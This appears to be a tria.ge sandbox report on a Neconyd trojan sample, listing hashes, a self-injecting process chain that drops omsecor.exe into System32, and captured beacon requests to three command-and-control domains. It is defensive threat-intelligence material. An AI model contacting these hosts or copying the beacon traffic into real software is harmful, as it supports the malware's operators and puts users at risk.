Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    115s
  • max time network
    119s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250129-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01/02/2025, 15:01 UTC

General

  • Target

    46e5bf4cc094c32ab551be8c442a5973bc9d6b68bb7fe5041e051f6460f6609aN.exe

  • Size

    96KB

  • MD5

    5a4e24466068994c8d2993885c234630

  • SHA1

    71ad823076f84943e7a84b18170620604c222816

  • SHA256

    46e5bf4cc094c32ab551be8c442a5973bc9d6b68bb7fe5041e051f6460f6609a

  • SHA512

    e63ba08d8b70e3fb81ec7556f9210600964a633a7920579fe9bbff0bca370b83b88e5abab7ee1910db82caa929787109b4138b02af9f7ff9f199e957641ce07b

  • SSDEEP

    1536:OnAHcBbLmdvduLd8IDiaP/8A68YaiIv2RwEYqlwi+BzdAeV9b5ADbyxxB:OGs8cd8eXlYairZYqMddH13B

Malware Config

Extracted

Family

neconyd

C2

http://ow5dirasuek.com/

http://mkkuei4kdsz.com/

http://lousta.net/

Signatures

  • Neconyd

    Neconyd is a trojan written in C++.

  • Neconyd family
  • Executes dropped EXE 6 IoCs
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Program crash 4 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious use of WriteProcessMemory 29 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\46e5bf4cc094c32ab551be8c442a5973bc9d6b68bb7fe5041e051f6460f6609aN.exe
    "C:\Users\Admin\AppData\Local\Temp\46e5bf4cc094c32ab551be8c442a5973bc9d6b68bb7fe5041e051f6460f6609aN.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:1140
    • C:\Users\Admin\AppData\Local\Temp\46e5bf4cc094c32ab551be8c442a5973bc9d6b68bb7fe5041e051f6460f6609aN.exe
      C:\Users\Admin\AppData\Local\Temp\46e5bf4cc094c32ab551be8c442a5973bc9d6b68bb7fe5041e051f6460f6609aN.exe
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1016
      • C:\Users\Admin\AppData\Roaming\omsecor.exe
        C:\Users\Admin\AppData\Roaming\omsecor.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1836
        • C:\Users\Admin\AppData\Roaming\omsecor.exe
          C:\Users\Admin\AppData\Roaming\omsecor.exe
          4⤵
          • Executes dropped EXE
          • Drops file in System32 directory
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4932
          • C:\Windows\SysWOW64\omsecor.exe
            C:\Windows\System32\omsecor.exe
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:3188
            • C:\Windows\SysWOW64\omsecor.exe
              C:\Windows\SysWOW64\omsecor.exe
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2412
              • C:\Users\Admin\AppData\Roaming\omsecor.exe
                C:\Users\Admin\AppData\Roaming\omsecor.exe
                7⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:3160
                • C:\Users\Admin\AppData\Roaming\omsecor.exe
                  C:\Users\Admin\AppData\Roaming\omsecor.exe
                  8⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:3988
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 256
                  8⤵
                  • Program crash
                  PID:3544
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 3188 -s 292
              6⤵
              • Program crash
              PID:4148
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1836 -s 292
          4⤵
          • Program crash
          PID:1732
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1140 -s 288
      2⤵
      • Program crash
      PID:100
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1140 -ip 1140
    1⤵
      PID:1536
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -pss -s 364 -p 1836 -ip 1836
      1⤵
        PID:832
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 3188 -ip 3188
        1⤵
          PID:4512
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 3160 -ip 3160
          1⤵
            PID:3768

          Network

          • flag-us
            DNS
            lousta.net
            omsecor.exe
            Remote address:
            8.8.8.8:53
            Request
            lousta.net
            IN A
            Response
            lousta.net
            IN A
            193.166.255.171
          • flag-us
            DNS
            73.159.190.20.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            73.159.190.20.in-addr.arpa
            IN PTR
            Response
          • flag-us
            DNS
            172.210.232.199.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            172.210.232.199.in-addr.arpa
            IN PTR
            Response
          • flag-us
            DNS
            55.36.223.20.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            55.36.223.20.in-addr.arpa
            IN PTR
            Response
          • flag-us
            DNS
            18.31.95.13.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            18.31.95.13.in-addr.arpa
            IN PTR
            Response
          • flag-us
            DNS
            50.23.12.20.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            50.23.12.20.in-addr.arpa
            IN PTR
            Response
          • flag-us
            DNS
            mkkuei4kdsz.com
            omsecor.exe
            Remote address:
            8.8.8.8:53
            Request
            mkkuei4kdsz.com
            IN A
            Response
            mkkuei4kdsz.com
            IN A
            3.33.243.145
            mkkuei4kdsz.com
            IN A
            15.197.204.56
          • flag-us
            GET
            http://mkkuei4kdsz.com/695/948.html
            omsecor.exe
            Remote address:
            3.33.243.145:80
            Request
            GET /695/948.html HTTP/1.1
            From: 133828956914329070
            Via: hprkjvr_vjwA<19cdsifA:_tfser>5514546cpwB7652bpf}B27547;65hbf>f:fg7:87i1=f:j556<f<
            Host: mkkuei4kdsz.com
            Connection: Keep-Alive
            Response
            HTTP/1.1 200 OK
            content-type: text/html
            date: Sat, 01 Feb 2025 15:02:35 GMT
            content-length: 114
          • flag-us
            DNS
            145.243.33.3.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            145.243.33.3.in-addr.arpa
            IN PTR
            Response
            145.243.33.3.in-addr.arpa
            IN PTR
            a3edc0dabdef92d6dawsglobalacceleratorcom
          • flag-us
            DNS
            ow5dirasuek.com
            omsecor.exe
            Remote address:
            8.8.8.8:53
            Request
            ow5dirasuek.com
            IN A
            Response
            ow5dirasuek.com
            IN A
            52.34.198.229
          • flag-us
            GET
            http://ow5dirasuek.com/295/829.html
            omsecor.exe
            Remote address:
            52.34.198.229:80
            Request
            GET /295/829.html HTTP/1.1
            From: 133828956914329070
            Via: hprkjvr_vjwA<19cdsifA:_tfser>5514546cpwB7652bpf}B27547;65hbf>f:fg7:87i1=f:j556<f<
            Host: ow5dirasuek.com
            Connection: Keep-Alive
            Response
            HTTP/1.1 200 OK
            Server: nginx
            Date: Sat, 01 Feb 2025 15:02:45 GMT
            Content-Type: text/html
            Transfer-Encoding: chunked
            Connection: close
            Set-Cookie: btst=d3eea329e99cb093c7076d8ec3e83f87|181.215.176.83|1738422165|1738422165|0|1|0; path=/; domain=.ow5dirasuek.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
            Set-Cookie: snkz=181.215.176.83; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
          • flag-us
            DNS
            229.198.34.52.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            229.198.34.52.in-addr.arpa
            IN PTR
            Response
            229.198.34.52.in-addr.arpa
            IN PTR
            ec2-52-34-198-229 us-west-2compute amazonawscom
          • flag-us
            DNS
            14.227.111.52.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            14.227.111.52.in-addr.arpa
            IN PTR
            Response
          • 193.166.255.171:80
            lousta.net
            omsecor.exe
            260 B
            5
          • 193.166.255.171:80
            lousta.net
            omsecor.exe
            260 B
            5
          • 3.33.243.145:80
            http://mkkuei4kdsz.com/695/948.html
            http
            omsecor.exe
            467 B
            388 B
            6
            4

            HTTP Request

            GET http://mkkuei4kdsz.com/695/948.html

            HTTP Response

            200
          • 52.34.198.229:80
            http://ow5dirasuek.com/295/829.html
            http
            omsecor.exe
            467 B
            623 B
            6
            5

            HTTP Request

            GET http://ow5dirasuek.com/295/829.html

            HTTP Response

            200
          • 193.166.255.171:80
            lousta.net
            omsecor.exe
            260 B
            5
          • 193.166.255.171:80
            lousta.net
            omsecor.exe
            156 B
            3
          • 8.8.8.8:53
            lousta.net
            dns
            omsecor.exe
            56 B
            72 B
            1
            1

            DNS Request

            lousta.net

            DNS Response

            193.166.255.171

          • 8.8.8.8:53
            73.159.190.20.in-addr.arpa
            dns
            72 B
            158 B
            1
            1

            DNS Request

            73.159.190.20.in-addr.arpa

          • 8.8.8.8:53
            172.210.232.199.in-addr.arpa
            dns
            74 B
            128 B
            1
            1

            DNS Request

            172.210.232.199.in-addr.arpa

          • 8.8.8.8:53
            55.36.223.20.in-addr.arpa
            dns
            71 B
            157 B
            1
            1

            DNS Request

            55.36.223.20.in-addr.arpa

          • 8.8.8.8:53
            50.23.12.20.in-addr.arpa
            dns
            70 B
            156 B
            1
            1

            DNS Request

            50.23.12.20.in-addr.arpa

          • 8.8.8.8:53
            18.31.95.13.in-addr.arpa
            dns
            70 B
            144 B
            1
            1

            DNS Request

            18.31.95.13.in-addr.arpa

          • 8.8.8.8:53
            mkkuei4kdsz.com
            dns
            omsecor.exe
            61 B
            93 B
            1
            1

            DNS Request

            mkkuei4kdsz.com

            DNS Response

            3.33.243.145
            15.197.204.56

          • 8.8.8.8:53
            145.243.33.3.in-addr.arpa
            dns
            71 B
            127 B
            1
            1

            DNS Request

            145.243.33.3.in-addr.arpa

          • 8.8.8.8:53
            ow5dirasuek.com
            dns
            omsecor.exe
            61 B
            77 B
            1
            1

            DNS Request

            ow5dirasuek.com

            DNS Response

            52.34.198.229

          • 8.8.8.8:53
            229.198.34.52.in-addr.arpa
            dns
            72 B
            135 B
            1
            1

            DNS Request

            229.198.34.52.in-addr.arpa

          • 8.8.8.8:53
            14.227.111.52.in-addr.arpa
            dns
            72 B
            158 B
            1
            1

            DNS Request

            14.227.111.52.in-addr.arpa

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Roaming\omsecor.exe

            Filesize

            96KB

            MD5

            5f78c8acd8d7a3c783977b7f65ed2124

            SHA1

            95dbbb6ce4854675e025b91adcd9a5f6866c932d

            SHA256

            3c3037c0182e088a172c2e7d57cea99d8d545fb7bd331ad2e35b2b11b0ead1d1

            SHA512

            b0d886e88c5648e08626105a298a09e5b70a3a499e8b403b0866fe34f846995eaaa5cf05959c7587fe57ae2b50c8ca3dedc83bff98cb0b28482ab23dd2f1c594

          • C:\Users\Admin\AppData\Roaming\omsecor.exe

            Filesize

            96KB

            MD5

            ec89c35902924c7111030966fac9ce59

            SHA1

            889457a38e68934db34638a0c3fe4050ce9bb516

            SHA256

            268444a3dcfa24c1666b7e056a38f4cc86720a2bd6204175f2ed2d0d0d1917f3

            SHA512

            c0d45398d2b8951a7817b4a3730c5ca0228ecb20892d55683955e149baf277b768e30e653917436f8e9d8ea561aca9cd19e9a1567541e49b5c76546d8f96f362

          • C:\Windows\SysWOW64\omsecor.exe

            Filesize

            96KB

            MD5

            3a453926a9b59232f7acd36daadd36b5

            SHA1

            3d77f56b7a25a73a87f0a091667f684bb47c7fa8

            SHA256

            9d9e1544e5160deff579c143fe0ef1e01962db7341c075dcfea86947d9c16cbd

            SHA512

            08c1116200b7b5d3b57337ea47aa7448252d98611fc69f85da097c571a51e034d7196bf92e61059b562c8dafeda605e1266b7da003d7fb2d4efa0b3a1a1362e9

          • memory/1016-3-0x0000000000400000-0x0000000000429000-memory.dmp

            Filesize

            164KB

          • memory/1016-1-0x0000000000400000-0x0000000000429000-memory.dmp

            Filesize

            164KB

          • memory/1016-2-0x0000000000400000-0x0000000000429000-memory.dmp

            Filesize

            164KB

          • memory/1016-6-0x0000000000400000-0x0000000000429000-memory.dmp

            Filesize

            164KB

          • memory/1140-0-0x0000000000400000-0x0000000000423000-memory.dmp

            Filesize

            140KB

          • memory/1140-18-0x0000000000400000-0x0000000000423000-memory.dmp

            Filesize

            140KB

          • memory/1836-17-0x0000000000400000-0x0000000000423000-memory.dmp

            Filesize

            140KB

          • memory/1836-10-0x0000000000400000-0x0000000000423000-memory.dmp

            Filesize

            140KB

          • memory/2412-38-0x0000000000400000-0x0000000000429000-memory.dmp

            Filesize

            164KB

          • memory/2412-40-0x0000000000400000-0x0000000000429000-memory.dmp

            Filesize

            164KB

          • memory/2412-37-0x0000000000400000-0x0000000000429000-memory.dmp

            Filesize

            164KB

          • memory/3160-45-0x0000000000400000-0x0000000000423000-memory.dmp

            Filesize

            140KB

          • memory/3160-52-0x0000000000400000-0x0000000000423000-memory.dmp

            Filesize

            140KB

          • memory/3188-53-0x0000000000400000-0x0000000000423000-memory.dmp

            Filesize

            140KB

          • memory/3188-34-0x0000000000400000-0x0000000000423000-memory.dmp

            Filesize

            140KB

          • memory/3988-50-0x0000000000400000-0x0000000000429000-memory.dmp

            Filesize

            164KB

          • memory/3988-49-0x0000000000400000-0x0000000000429000-memory.dmp

            Filesize

            164KB

          • memory/3988-54-0x0000000000400000-0x0000000000429000-memory.dmp

            Filesize

            164KB

          • memory/4932-15-0x0000000000400000-0x0000000000429000-memory.dmp

            Filesize

            164KB

          • memory/4932-33-0x0000000000400000-0x0000000000429000-memory.dmp

            Filesize

            164KB

          • memory/4932-26-0x0000000000400000-0x0000000000429000-memory.dmp

            Filesize

            164KB

          • memory/4932-25-0x0000000000400000-0x0000000000429000-memory.dmp

            Filesize

            164KB

          • memory/4932-22-0x0000000000400000-0x0000000000429000-memory.dmp

            Filesize

            164KB

          • memory/4932-19-0x0000000000400000-0x0000000000429000-memory.dmp

            Filesize

            164KB

          • memory/4932-14-0x0000000000400000-0x0000000000429000-memory.dmp

            Filesize

            164KB

          We care about your privacy.

          This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.